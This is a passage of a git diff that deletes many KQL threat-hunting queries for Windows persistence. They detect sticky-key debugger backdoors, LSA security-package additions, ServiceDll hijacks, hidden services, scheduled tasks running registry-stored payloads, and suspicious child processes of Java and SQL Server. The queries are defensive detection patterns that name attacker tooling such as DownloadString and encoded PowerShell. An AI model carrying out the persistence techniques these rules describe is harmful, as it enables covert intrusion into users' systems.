-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql b/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
deleted file mode 100644
index dc47093d..00000000
--- a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/28 -// Level: high -// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension -// Tags: attack.persistence, attack.t1133 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains 
"hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey 
contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or 
RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp")
\ No newline at end of file
diff --git a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql b/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql
deleted file mode 100644
index 5d08fc53..00000000
--- a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Syed Hasan (@syedhasan009)
-// Date: 2021/06/18
-// Level: high
-// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
-// Tags: attack.persistence, attack.t1053, attack.t1053.005
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache" and (not(((RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\"))))
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
deleted file mode 100644
index 3d746a96..00000000
--- a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql
deleted file mode 100644
index 0e49c7fb..00000000
--- a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
deleted file mode 100644
index c68909e4..00000000
--- a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql b/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql
deleted file mode 100644
index 7d8944ed..00000000
--- a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: iwillkeepwatch
-// Date: 2019/01/18
-// Level: high
-// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
-
-// Tags: attack.persistence, attack.t1547.005
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
diff --git a/Persistence/ServiceDll_Hijack.kql b/Persistence/ServiceDll_Hijack.kql
deleted file mode 100644
index fb9f8be0..00000000
--- a/Persistence/ServiceDll_Hijack.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/02/04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Persistence/Session_Manager_Autorun_Keys_Modification.kql b/Persistence/Session_Manager_Autorun_Keys_Modification.kql
deleted file mode 100644
index d2a2b737..00000000
--- a/Persistence/Session_Manager_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001, attack.t1546.009
-DeviceRegistryEvents
-| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql b/Persistence/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Persistence/Startup_Folder_File_Write.kql b/Persistence/Startup_Folder_File_Write.kql
deleted file mode 100644
index d547ca8a..00000000
--- a/Persistence/Startup_Folder_File_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql b/Persistence/Sticky_Key_Like_Backdoor_Execution.kql
deleted file mode 100644
index 0509bca7..00000000
--- a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
deleted file mode 100644
index 0a1e634c..00000000
--- a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceRegistryEvents
-| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql b/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql
deleted file mode 100644
index e3938878..00000000
--- a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
-// Date: 2022/10/01
-// Level: high
-// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
-// Tags: attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql b/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
deleted file mode 100644
index 6ce7feb5..00000000
--- a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022/06/19
-// Level: high
-// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
-// Tags: attack.persistence, attack.t1176
-DeviceProcessEvents
